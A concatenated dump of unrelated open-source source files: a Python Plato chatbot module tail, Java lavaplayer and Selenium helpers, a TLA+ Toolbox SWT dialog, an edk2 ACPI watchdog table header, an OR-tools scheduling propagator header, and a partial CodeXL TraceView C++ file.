self.context.append(bot_responses[0].strip())
return bot_responses
@contextlib.contextmanager
def interactive_mode(self, max_turn=6):
"""
Enter the interactive mode.
Args:
max_turn(int): the max dialogue turns. max_turn = 1 means the robot can only remember the last one utterance you have said.
"""
self._interactive_mode = True
self.max_turn = max_turn
self.context = []
yield
self.context = []
self._interactive_mode = False
@runnable
def run_cmd(self, argvs):
"""
Run as a command
"""
self.parser = argparse.ArgumentParser(
description='Run the %s module.' % self.name,
prog='hub run %s' % self.name,
usage='%(prog)s',
add_help=True)
self.arg_input_group = self.parser.add_argument_group(title="Input options", description="Input data. Required")
self.arg_config_group = self.parser.add_argument_group(
title="Config options", description="Run configuration for controlling module behavior, optional.")
self.add_module_input_arg()
args = self.parser.parse_args(argvs)
try:
input_data = self.check_input_data(args)
except DataFormatError and RuntimeError:
self.parser.print_help()
return None
results = self.generate(texts=input_data)
return results
if __name__ == "__main__":
module = Plato()
for result in module.generate(["Hello", "Hello\thi, nice to meet you, my name is tom\tso your name is tom?"]):
print(result)
with module.interactive_mode(max_turn=3):
while True:
human_utterance = input()
robot_utterance = module.generate(human_utterance)
print("Robot: %s" % robot_utterance[0])
| 2,798 |
868 |
<reponame>phamleduy04/lavaplayer
package com.sedmelluq.discord.lavaplayer.tools.http;
import java.util.Collection;
import java.util.function.Consumer;
import java.util.function.Function;
import org.apache.http.client.config.RequestConfig;
import org.apache.http.impl.client.HttpClientBuilder;
public class MultiHttpConfigurable implements ExtendedHttpConfigurable {
private final Collection<ExtendedHttpConfigurable> configurables;
public MultiHttpConfigurable(Collection<ExtendedHttpConfigurable> configurables) {
this.configurables = configurables;
}
@Override
public void setHttpContextFilter(HttpContextFilter filter) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.setHttpContextFilter(filter);
}
}
@Override
public void configureRequests(Function<RequestConfig, RequestConfig> configurator) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.configureRequests(configurator);
}
}
@Override
public void configureBuilder(Consumer<HttpClientBuilder> configurator) {
for (ExtendedHttpConfigurable configurable : configurables) {
configurable.configureBuilder(configurator);
}
}
}
| 364 |
379 |
package com.example.springdemo.springdemo.selenium;
import org.openqa.selenium.By;
import org.openqa.selenium.JavascriptExecutor;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.WebElement;
import org.openqa.selenium.support.ui.ExpectedConditions;
import org.openqa.selenium.support.ui.WebDriverWait;
import org.springframework.stereotype.Service;
/**
* @program: springBootPractice
* @description:
* @author: hu_pf
* @create: 2020-06-03 14:16
**/
@Service("className")
public class ClickByClassName implements ClickInterface{
@Override
public void click(String name, WebDriver driver) {
waitDriver(name,driver);
WebElement element = driver.findElement(By.className(name));
((JavascriptExecutor) driver).executeScript("arguments[0].click();", element);
}
@Override
public void waitDriver(String name,WebDriver driver) {
WebDriverWait wait = new WebDriverWait(driver,10,1);
wait.until(ExpectedConditions.elementToBeClickable(By.className(name)));
}
}
| 362 |
1,768 |
<reponame>zwergziege/tlaplus
/*******************************************************************************
* Copyright (c) 2019 Microsoft Research. All rights reserved.
*
* The MIT License (MIT)
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is furnished to do
* so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
* WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
* Contributors:
* <NAME> - initial API and implementation
* <NAME> - Rewrite of ErrorViewTraceFilterDialog
******************************************************************************/
package org.lamport.tla.toolbox.tool.tlc.ui.dialog;
import java.util.Arrays;
import java.util.Set;
import org.eclipse.jface.dialogs.Dialog;
import org.eclipse.jface.dialogs.IDialogConstants;
import org.eclipse.jface.resource.JFaceResources;
import org.eclipse.jface.viewers.ArrayContentProvider;
import org.eclipse.jface.viewers.CheckboxTableViewer;
import org.eclipse.jface.viewers.ColumnLabelProvider;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.layout.GridData;
import org.eclipse.swt.layout.GridLayout;
import org.eclipse.swt.widgets.Button;
import org.eclipse.swt.widgets.Composite;
import org.eclipse.swt.widgets.Control;
import org.eclipse.swt.widgets.Label;
import org.eclipse.swt.widgets.Shell;
public class ExtraModulesDialog extends Dialog {
private CheckboxTableViewer tableViewer;
private final Set<String> modules;
private final Set<String> selection;
/**
* @param parentShell
* @param modules a copy of this list will be made
* @param previouslySelectedModuleNames
*/
public ExtraModulesDialog(final Shell parentShell, final Set<String> modules, Set<String> previouslySelectedModuleNames) {
super(parentShell);
this.modules = modules;
this.selection = previouslySelectedModuleNames;
}
public Set<String> getSelection() {
return selection;
}
@Override
protected final Control createDialogArea(final Composite parent) {
final Composite container = (Composite) super.createDialogArea(parent);
GridLayout gl = new GridLayout(2, false);
gl.verticalSpacing = 9;
container.setLayout(gl);
final Label l = new Label(container, SWT.LEFT);
l.setText("Selected modules to be made available in trace expressions.");
l.setFont(JFaceResources.getFontRegistry().get(JFaceResources.DIALOG_FONT));
GridData gd = new GridData();
gd.horizontalSpan = 2;
l.setLayoutData(gd);
tableViewer = CheckboxTableViewer.newCheckList(container, SWT.BORDER | SWT.V_SCROLL | SWT.SINGLE);
tableViewer.setContentProvider(new ArrayContentProvider());
tableViewer.setLabelProvider(new ColumnLabelProvider() {
@Override
public String getText(final Object element) {
return (String) element;
}
});
tableViewer.setInput(modules);
selection.stream().forEach((element) -> tableViewer.setChecked(element, true));
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
gd.minimumWidth = 333;
tableViewer.getTable().setLayoutData(gd);
final Composite buttonPane = new Composite(container, SWT.NONE);
gl = new GridLayout(1, false);
buttonPane.setLayout(gl);
Button b = new Button(buttonPane, SWT.PUSH);
b.setText("Select All");
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
b.setLayoutData(gd);
b.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(final SelectionEvent se) {
tableViewer.setAllChecked(true);
}
});
b = new Button(buttonPane, SWT.PUSH);
b.setText("Deselect All");
gd = new GridData();
gd.horizontalAlignment = SWT.FILL;
gd.grabExcessHorizontalSpace = true;
b.setLayoutData(gd);
b.addSelectionListener(new SelectionAdapter() {
@Override
public void widgetSelected(final SelectionEvent se) {
tableViewer.setAllChecked(false);
}
});
return container;
}
@Override
protected void okPressed() {
selection.clear();
Arrays.stream(tableViewer.getCheckedElements()).forEach((element) -> selection.add((String)element));
super.okPressed();
}
@Override
protected void createButtonsForButtonBar(Composite parent) {
createButton(parent, IDialogConstants.OK_ID, IDialogConstants.OK_LABEL, true);
}
@Override
protected void configureShell(Shell shell) {
super.configureShell(shell);
shell.setText("Extra Modules");
}
}
| 2,003 |
2,757 |
<reponame>KrzysztofKoch1/edk2
/** @file
ACPI Watchdog Action Table (WADT) as defined at
Microsoft Hardware Watchdog Timers Design Specification.
Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials
are licensed and made available under the terms and conditions of the BSD License
which accompanies this distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
#ifndef _WATCHDOG_ACTION_TABLE_H_
#define _WATCHDOG_ACTION_TABLE_H_
#include <IndustryStandard/Acpi.h>
//
// Ensure proper structure formats
//
#pragma pack(1)
///
/// Watchdog Action Table definition.
///
typedef struct {
EFI_ACPI_DESCRIPTION_HEADER Header;
UINT32 WatchdogHeaderLength;
UINT16 PCISegment;
UINT8 PCIBusNumber;
UINT8 PCIDeviceNumber;
UINT8 PCIFunctionNumber;
UINT8 Reserved_45[3];
UINT32 TimerPeriod;
UINT32 MaxCount;
UINT32 MinCount;
UINT8 WatchdogFlags;
UINT8 Reserved_61[3];
UINT32 NumberWatchdogInstructionEntries;
} EFI_ACPI_WATCHDOG_ACTION_1_0_TABLE;
///
/// Watchdog Instruction Entries
///
typedef struct {
UINT8 WatchdogAction;
UINT8 InstructionFlags;
UINT8 Reserved_2[2];
EFI_ACPI_2_0_GENERIC_ADDRESS_STRUCTURE RegisterRegion;
UINT32 Value;
UINT32 Mask;
} EFI_ACPI_WATCHDOG_ACTION_1_0_WATCHDOG_ACTION_INSTRUCTION_ENTRY;
#pragma pack()
///
/// WDAT Revision (defined in spec)
///
#define EFI_ACPI_WATCHDOG_ACTION_1_0_TABLE_REVISION 0x01
//
// WDAT 1.0 Flags
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ENABLED 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_STOPPED_IN_SLEEP_STATE 0x80
//
// WDAT 1.0 Watchdog Actions
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_RESET 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_CURRENT_COUNTDOWN_PERIOD 0x4
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_COUNTDOWN_PERIOD 0x5
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_COUNTDOWN_PERIOD 0x6
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_RUNNING_STATE 0x8
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_RUNNING_STATE 0x9
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_STOPPED_STATE 0xA
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_STOPPED_STATE 0xB
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_REBOOT 0x10
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_REBOOT 0x11
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_SHUTDOWN 0x12
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_SHUTDOWN 0x13
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_QUERY_WATCHDOG_STATUS 0x20
#define EFI_ACPI_WDAT_1_0_WATCHDOG_ACTION_SET_WATCHDOG_STATUS 0x21
//
// WDAT 1.0 Watchdog Action Entry Instruction Flags
//
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_READ_VALUE 0x0
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_READ_COUNTDOWN 0x1
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_WRITE_VALUE 0x2
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_WRITE_COUNTDOWN 0x3
#define EFI_ACPI_WDAT_1_0_WATCHDOG_INSTRUCTION_PRESERVE_REGISTER 0x80
#endif
| 2,216 |
8,273 |
// Copyright 2010-2021 Google LLC
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#ifndef OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
#define OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
#include <vector>
#include "ortools/base/int_type.h"
#include "ortools/base/macros.h"
#include "ortools/sat/integer.h"
#include "ortools/sat/intervals.h"
#include "ortools/sat/sat_base.h"
namespace operations_research {
namespace sat {
// TimeTableEdgeFinding implements the timetable edge finding filtering rule
// presented in <NAME>, "Timetable edge finding filtering algorithm for
// discrete cumulative resources", CPAIOR 2011,
// http://vilim.eu/petr/cpaior2011.pdf.
//
// This propagator runs in O(n^2) where n is the number of tasks. It increases
// both the start times and decreases the ending times of the tasks.
//
// Note that this propagator does not ensure that the cumulative constraint
// holds. It should thus always be used with at least a timetable propagator.
//
// ALOGRITHM:
//
// The algorithm relies on free tasks. A free task is basically a task without
// its mandatory part. For instance:
//
// s_min s_max e_min e_max
// v v v v
// task: =============================
// ^ ^ ^
// | free part | Mandatory part |
//
// Obviously, the free part of a task that has no mandatory part is equal to the
// task itself. Also, a free part cannot have a mandatory part by definition. A
// fixed task thus have no free part.
//
// The idea of the algorithm is to use free and mandatory parts separately to
// have a better estimation of the energy contained in a task interval.
//
// If the sum of the energy of all the free parts and mandatory subparts
// contained in a task interval exceeds the amount of energy available, then the
// problem is unfeasible. A task thus cannot be scheduled at its minimum start
// time if this would cause an overload in one of the task intervals.
class TimeTableEdgeFinding : public PropagatorInterface {
public:
TimeTableEdgeFinding(const std::vector<AffineExpression>& demands,
AffineExpression capacity,
SchedulingConstraintHelper* helper,
IntegerTrail* integer_trail);
bool Propagate() final;
void RegisterWith(GenericLiteralWatcher* watcher);
private:
// Build the timetable and fills the mandatory_energy_before_start_min_ and
// mandatory_energy_before_end_max_.
//
// TODO(user): Share the profile building code with TimeTablingPerTask ! we do
// not really need the mandatory_energy_before_* vectors and can recompute the
// profile integral in a window efficiently during TimeTableEdgeFindingPass().
void BuildTimeTable();
// Performs a single pass of the Timetable Edge Finding filtering rule to
// updates the start time of the tasks. This same function can be used to
// update the end times by calling the SwitchToMirrorProblem method first.
bool TimeTableEdgeFindingPass();
// Increases the start min of task_index with the proper explanation.
bool IncreaseStartMin(IntegerValue begin, IntegerValue end, int task_index,
IntegerValue new_start);
IntegerValue DemandMin(int task_index) const {
return integer_trail_->LowerBound(demands_[task_index]);
}
IntegerValue CapacityMax() const {
return integer_trail_->UpperBound(capacity_);
}
// Number of tasks.
const int num_tasks_;
// IntervalVariable and IntegerVariable of each tasks that must be considered
// in this constraint.
std::vector<AffineExpression> demands_;
const AffineExpression capacity_;
SchedulingConstraintHelper* helper_;
IntegerTrail* integer_trail_;
// Start (resp. end) of the compulsory parts used to build the profile.
std::vector<TaskTime> scp_;
std::vector<TaskTime> ecp_;
// Sizes and energy of the free parts. One is just the other times the
// minimum demand.
std::vector<IntegerValue> size_free_;
std::vector<IntegerValue> energy_free_;
// Energy contained in the time table before the start min (resp. end max)
// of each task.
std::vector<IntegerValue> mandatory_energy_before_start_min_;
std::vector<IntegerValue> mandatory_energy_before_end_max_;
DISALLOW_COPY_AND_ASSIGN(TimeTableEdgeFinding);
};
} // namespace sat
} // namespace operations_research
#endif // OR_TOOLS_SAT_TIMETABLE_EDGEFINDING_H_
| 1,581 |
1,025 |
//=====================================================================
// Copyright (c) 2012 Advanced Micro Devices, Inc. All rights reserved.
//
/// \author GPU Developer Tools
/// \file $File: //devtools/main/CodeXL/Components/GpuProfiling/AMDTGpuProfiling/TraceView.cpp $
/// \version $Revision: #144 $
/// \brief : This file contains TraceView
//
//=====================================================================
// $Id: //devtools/main/CodeXL/Components/GpuProfiling/AMDTGpuProfiling/TraceView.cpp#144 $
// Last checkin: $DateTime: 2016/03/30 04:04:03 $
// Last edited by: $Author: salgrana $
// Change list: $Change: 566240 $
//==============
#include <qtIgnoreCompilerWarnings.h>
#include <QtCore>
#include <QtWidgets>
// Infra:
#include <AMDTBaseTools/Include/gtAssert.h>
#include <AMDTAPIClasses/Include/Events/apEventsHandler.h>
#include <AMDTApplicationComponents/Include/acItemDelegate.h>
#include <AMDTApplicationComponents/Include/acMessageBox.h>
#include <AMDTApplicationComponents/Include/acFunctions.h>
#include <AMDTOSWrappers/Include/osThread.h>
#include <AMDTApplicationComponents/Include/Timeline/acTimeline.h>
#include "AtpUtils.h"
#include <HSAFunctionDefs.h>
// AMDTApplicationFramework:
#include <AMDTApplicationFramework/Include/afApplicationCommands.h>
#include <AMDTApplicationFramework/Include/afGlobalVariablesManager.h>
#include <AMDTApplicationFramework/Include/afProgressBarWrapper.h>
#include <AMDTApplicationFramework/Include/afHTMLContent.h>
// AMDTApplicationFramework:
#include <AMDTApplicationFramework/Include/afApplicationCommands.h>
#include <AMDTApplicationFramework/Include/afMainAppWindow.h>
// AMDTSharedProfiling:
#include <AMDTSharedProfiling/inc/ProfileApplicationTreeHandler.h>
#include <CL/cl.h>
// Local:
#include <AMDTGpuProfiling/CLAPIDefs.h>
#include <AMDTGpuProfiling/TraceView.h>
#include <AMDTGpuProfiling/TraceTable.h>
#include <AMDTGpuProfiling/AMDTGpuProfilerDefs.h>
#include <AMDTGpuProfiling/CLTimelineItems.h>
#include <AMDTGpuProfiling/HSATimelineItems.h>
#include <AMDTGpuProfiling/KernelOccupancyWindow.h>
#include <AMDTGpuProfiling/SymbolInfo.h>
#include <AMDTGpuProfiling/APIColorMap.h>
#include <AMDTGpuProfiling/ProfileManager.h>
#include <AMDTGpuProfiling/SessionViewTabWidget.h>
#include <AMDTGpuProfiling/gpViewsCreator.h>
#include <iostream>
#include <Version.h>
#include <ProfilerOutputFileDefs.h>
static QList<TraceTableModel::TraceTableColIndex> s_hsaHiddenColumns = { TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN, TraceTableModel::TRACE_OCCUPANCY_COLUMN, TraceTableModel::TRACE_DEVICE_TIME_COLUMN };
static const unsigned int s_UI_REFRESH_RATE = 1000;
static const unsigned int s_MAX_TRACE_ENTRIES = 200000;
static const int PROGRESS_STAGES = 6;
TraceView::TraceView(QWidget* parent) : gpBaseSessionView(parent),
m_pCurrentSession(nullptr),
m_pMainSplitter(nullptr),
m_pTimeline(nullptr),
m_pTraceTabView(nullptr),
m_pSummaryView(nullptr),
m_pSymbolInfo(nullptr),
m_pSummarizer(nullptr),
m_pOpenCLBranch(nullptr),
m_pHSABranch(nullptr),
m_pHSADataTransferBranch(nullptr),
m_perfMarkersAdded(false)
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
, m_lastDeviceItem(nullptr),
m_lastDeviceItemIdx(-1)
#endif
, m_areTimelinePropertiesSet(false),
m_parseCallsCounter(0),
m_alreadyDisplayedAPILimitMessage(false),
m_shouldStopParsing(false),
m_maxTimestampWhenParsingStopped(0),
m_isProgressRangeSet(false)
{
BuildWindowLayout();
// Add the actions to the table:
m_pCopyAction = m_pTraceTableContextMenu->addAction(AF_STR_CopyA, this, SLOT(OnEditCopy()));
m_pSelectAllAction = m_pTraceTableContextMenu->addAction(AF_STR_SelectAllA, this, SLOT(OnEditSelectAll()));
m_pTraceTableContextMenu->addSeparator();
m_pExpandAllAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewExpandAll, this, SLOT(OnExpandAll()));
m_pCollapseAllAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewCollapseAll, this, SLOT(OnCollapseAll()));
m_pTraceTableContextMenu->addSeparator();
m_pGotoSourceAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewGoToSource, this, SLOT(OnGotoSource()));
m_pZoomInTimelineAction = m_pTraceTableContextMenu->addAction(GPU_STR_TraceViewZoomTimeline, this, SLOT(OnZoomItemInTimeline()));
m_pTraceTableContextMenu->addSeparator();
m_pExportToCSVAction = m_pTraceTableContextMenu->addAction(AF_STR_ExportToCSV, this, SLOT(OnExportToCSV()));
bool rc = connect(m_pTimeline, SIGNAL(itemClicked(acTimelineItem*)), this, SLOT(TimelineItemClickedHandler(acTimelineItem*)));
GT_ASSERT(rc);
rc = connect(m_pTimeline, SIGNAL(branchClicked(acTimelineBranch*)), this, SLOT(TimelineBranchClickedHandler(acTimelineBranch*)));
GT_ASSERT(rc);
rc = connect(afApplicationCommands::instance()->applicationTree()->treeControl(), SIGNAL(itemChanged(QTreeWidgetItem*, int)), this, SLOT(OnApplicationTreeSelection()));
GT_ASSERT(rc);
}
TraceView::~TraceView()
{
SAFE_DELETE(m_pSummarizer);
// Remove me from the list of session windows in the session view creator:
gpViewsCreator::Instance()->OnWindowClose(this);
AtpUtils::Instance()->RemoveHandlerFromCallBackHandlerList(this);
}
bool TraceView::DisplaySession(const osFilePath& sessionFilePath, afTreeItemType sessionInnerPage, QString& errorMessage)
{
bool retVal = true;
// If this is a new session file, load the session
if (m_sessionFilePath != sessionFilePath)
{
// Call the base class implementation
retVal = SharedSessionWindow::DisplaySession(sessionFilePath, sessionInnerPage, errorMessage);
// Initialize the session file path:
m_sessionFilePath = sessionFilePath;
m_pCurrentSession = nullptr;
m_alreadyDisplayedAPILimitMessage = false;
m_shouldStopParsing = false;
m_maxTimestampWhenParsingStopped = 0;
m_pCurrentSession = qobject_cast <TraceSession*> (m_pSessionData);
// Sanity check:
GT_IF_WITH_ASSERT((m_pCurrentSession != nullptr) && (m_pCurrentSession->m_pParentData != nullptr))
{
// Reset the flag stating the the occupancy file was loaded:
m_pCurrentSession->ResetOccupancyFileLoad();
if (m_pCurrentSession->m_pParentData->m_filePath.exists())
{
int thisSessionMajor = m_pCurrentSession->GetVersionMajor();
int thisSessionMinor = m_pCurrentSession->GetVersionMinor();
if ((thisSessionMajor > RCP_MAJOR_VERSION) || (thisSessionMajor == RCP_MAJOR_VERSION && thisSessionMinor > RCP_MINOR_VERSION))
{
// Output a message to the user
errorMessage = GP_Str_NewerTraceSession;
// Hide the progress dialog
afProgressBarWrapper::instance().hideProgressBar();
retVal = false;
}
else
{
LoadSessionUsingBackendParser(m_pCurrentSession->m_pParentData->m_filePath);
// if we didn't load symbol info from .atp file, try loading it from .st file
if (m_symbolTableMap.isEmpty())
{
osFilePath stFilePath = m_pCurrentSession->m_pParentData->m_filePath;
stFilePath.setFileExtension(L"st");
if (stFilePath.exists())
{
LoadSessionUsingBackendParser(stFilePath);
}
}
// if we didn't load CL perfmarker info from .atp file, try loading it from .clperfmarker file
if (!m_perfMarkersAdded)
{
osFilePath perfMarkerFilePath = m_pCurrentSession->m_pParentData->m_filePath;
perfMarkerFilePath.setFileExtension(L"clperfmarker");
if (perfMarkerFilePath.exists())
{
LoadSessionUsingBackendParser(perfMarkerFilePath);
}
}
DoneParsingATPFile();
// Load the summary view
LoadSummary(sessionInnerPage);
afProgressBarWrapper::instance().hideProgressBar();
}
}
}
}
if ((m_pSummaryView != nullptr) && (m_pTraceTabView != nullptr) && (m_pSessionTabWidget != nullptr))
{
m_pSummaryView->DisplaySummaryPageType(sessionInnerPage);
// Find the summary view tab index
int summaryTabIndex = -1;
for (int i = 0; i < m_pTraceTabView->count(); i++)
{
if (m_pTraceTabView->tabText(i) == GPU_STR_TraceViewSummary)
{
summaryTabIndex = i;
break;
}
}
if (summaryTabIndex >= 0)
{
m_pTraceTabView->setCurrentIndex(summaryTabIndex);
}
// Set the timeline as the current index
m_pSessionTabWidget->setCurrentIndex(0);
}
return retVal;
}
void TraceView::LoadSummary(afTreeItemType summaryItemType)
{
if (m_pSummarizer == nullptr)
{
m_pSummarizer = new CLSummarizer(m_pCurrentSession);
}
m_pSummarizer->CreateSummaryPages();
if (m_pTraceTabView != nullptr && m_pSummarizer->GetSummaryPagesMap().count() != 0)
{
if (m_pSummaryView == nullptr)
{
m_pSummaryView = new SummaryView(this);
connect(m_pSummaryView, SIGNAL(LinkClicked(const QString&, unsigned int, unsigned int, AnalyzerHTMLViewType)),
this, SLOT(SummaryPageLinkClickedHandler(const QString&, unsigned int, unsigned int, AnalyzerHTMLViewType)));
}
GT_IF_WITH_ASSERT(m_pSummaryView->LoadSession(m_pCurrentSession, m_pSummarizer))
{
int indexOfSummary = m_pTraceTabView->addTab(m_pSummaryView, GPU_STR_TraceViewSummary);
m_pTraceTabView->setCurrentIndex(indexOfSummary);
m_pSummaryView->DisplaySummaryPageType(summaryItemType);
}
}
}
void TraceView::AddTraceTable(TraceTableModel* pModel, unsigned int threadId)
{
// Sanity check:
GT_IF_WITH_ASSERT(pModel != nullptr)
{
// Check if the table contain API calls. If the table is empty (due to limited API calls that we load),
// do not add it to the tab view:
if (!pModel->IsEmpty())
{
// Initialize the model:
bool rc = pModel->InitializeModel();
GT_ASSERT(rc);
// Update the UI:
// handles [BUG438186]
// don't create trace view tab if model don't have items (only known by reserved items in this point)
GT_IF_WITH_ASSERT(qApp != nullptr && (pModel->GetReservedApiCallsTraceItems() > 0))
{
QString strTabCaption = QString(GPU_STR_TraceViewHostThreadBranchName).arg(threadId);
TraceTable* pNewTable = new TraceTable(this, threadId);
// Do not set this delegate item, it causes performance overhead which we cannot afford:
// pNewTable->setItemDelegate(new acItemDelegate);
pNewTable->setContextMenuPolicy(Qt::CustomContextMenu);
connect(pNewTable, SIGNAL(customContextMenuRequested(const QPoint&)), this, SLOT(TraceTableContextMenuHandler(const QPoint&)));
connect(pNewTable, SIGNAL(clicked(QModelIndex)), this, SLOT(TraceTableMouseClickedHandler(const QModelIndex&)));
connect(pNewTable, SIGNAL(doubleClicked(const QModelIndex&)), this, SLOT(TraceTableMouseDoubleClickedHandler(const QModelIndex&)));
connect(pNewTable, SIGNAL(entered(const QModelIndex&)), this, SLOT(TraceTableMouseEnteredHandler(const QModelIndex&)));
pNewTable->setModel(pModel);
if (m_api == APIToTrace_HSA)
{
pNewTable->SetHiddenColumnsList(s_hsaHiddenColumns);
}
GT_IF_WITH_ASSERT(m_pTraceTabView != nullptr)
{
m_pTraceTabView->addTab(pNewTable, strTabCaption);
pNewTable->expandAll();
}
}
}
}
}
void TraceView::Clear()
{
m_pTimeline->reset();
if (m_pSummaryView != nullptr)
{
m_pSummaryView->Reset();
}
SAFE_DELETE(m_pSummarizer);
m_pTraceTabView->clear();
if (m_pCurrentSession != nullptr)
{
m_pCurrentSession->FlushData();
}
m_modelMap.clear();
m_hostBranchMap.clear();
m_symbolTableMap.clear();
m_pOpenCLBranch = nullptr;
m_pHSABranch = nullptr;
m_pHSADataTransferBranch = nullptr;
for (std::vector<HSADataTransferBranchInfo>::iterator it = m_hsaDataTransferBranches.begin();
it != m_hsaDataTransferBranches.end(); ++it)
{
it->m_pTransferBranch = nullptr;
}
m_hsaDataTransferBranches.clear();
m_oclCtxMap.clear();
m_oclQueueMap.clear();
m_hsaQueueMap.clear();
m_oclThreadOccIndexMap.clear();
m_hsaThreadOccIndexMap.clear();
m_timestampStack.clear();
m_titleStack.clear();
m_branchStack.clear();
m_perfMarkersAdded = false;
#ifdef SHOW_KERNEL_LAUNCH_AND_COMPLETION_LATENCY
m_lastDeviceItem = nullptr;
m_lastDeviceItemIdx = -1;
#endif
}
SymbolInfo* TraceView::GetSymbolInfo(int threadId, int callIndex)
{
SymbolInfo* pRetVal = nullptr;
if (callIndex >= 0 && m_symbolTableMap.contains(threadId))
{
QList<SymbolInfo*> list = m_symbolTableMap[threadId];
if (list.count() > callIndex)
{
pRetVal = list[callIndex];
}
}
return pRetVal;
}
bool TraceView::SessionHasSymbolInformation()
{
return m_symbolTableMap.isEmpty();
}
void TraceView::TraceTableMouseClickedHandler(const QModelIndex& modelIndex)
{
TraceTableItem* item = static_cast<TraceTableItem*>(modelIndex.internalPointer());
QTreeView* table = dynamic_cast<QTreeView*>(sender());
if (table != nullptr)
{
if (modelIndex.column() == TraceTableModel::TRACE_OCCUPANCY_COLUMN)
{
IOccupancyInfoDataHandler* occInfo = item->GetOccupancyInfo();
if (occInfo != nullptr)
{
m_strOccupancyKernelName = QString::fromStdString(occInfo->GetKernelName());
// get the api index from the Index column (column 0)
QString strCallIndex;
strCallIndex = item->GetColumnData(TraceTableModel::TRACE_INDEX_COLUMN).toString();
bool ok;
int callIndex = strCallIndex.toInt(&ok);
// if we got a valid call index, then show the occupancy view
if (ok)
{
m_currentDisplayedOccupancyKernel = QString::fromStdString(occInfo->GetKernelName());
QString strErrorMessageOut;
connect(ProfileManager::Instance(), SIGNAL(OccupancyFileGenerationFinished(bool, const QString&, const QString&)), this, SLOT(OnOccupancyFileGenerationFinish(bool, const QString&, const QString&)));
// Generate occupancy page
bool retVal = ProfileManager::Instance()->GenerateOccupancyPage(m_pCurrentSession, occInfo, callIndex, strErrorMessageOut);
if (!retVal)
{
Util::ShowErrorBox(strErrorMessageOut);
}
}
}
}
else if (modelIndex.column() == TraceTableModel::TRACE_DEVICE_BLOCK_COLUMN)
{
acTimelineItem* deviceBlockItem = item->GetDeviceBlock();
if (deviceBlockItem != nullptr)
{
// at this point, we know that the user has clicked a device block cell
m_pTimeline->ZoomToItem(deviceBlockItem, true);
}
}
}
}
void TraceView::TraceTableMouseDoubleClickedHandler(const QModelIndex& modelIndex)
{
// Get the activated item:
TraceTableItem* pItem = static_cast<TraceTableItem*>(modelIndex.internalPointer());
GT_IF_WITH_ASSERT(pItem != nullptr)
{
// Zoom the timeline into the double-clicked item:
m_pTimeline->ZoomToItem(pItem->GetTimelineItem(), true);
// Display the item properties:
DisplayItemInPropertiesView(pItem->GetTimelineItem());
}
}
void TraceView::TraceTableMouseEnteredHandler(const QModelIndex& modelIndex)
{
TraceTableItem* item = static_cast<TraceTableItem*>(modelIndex.internalPointer());
// change the mouse cursor to the hand cursor when hovering over a device block item or a kernel occupancy item
QTreeView* table = dynamic_cast<QTreeView*>(sender());
if (table != nullptr)
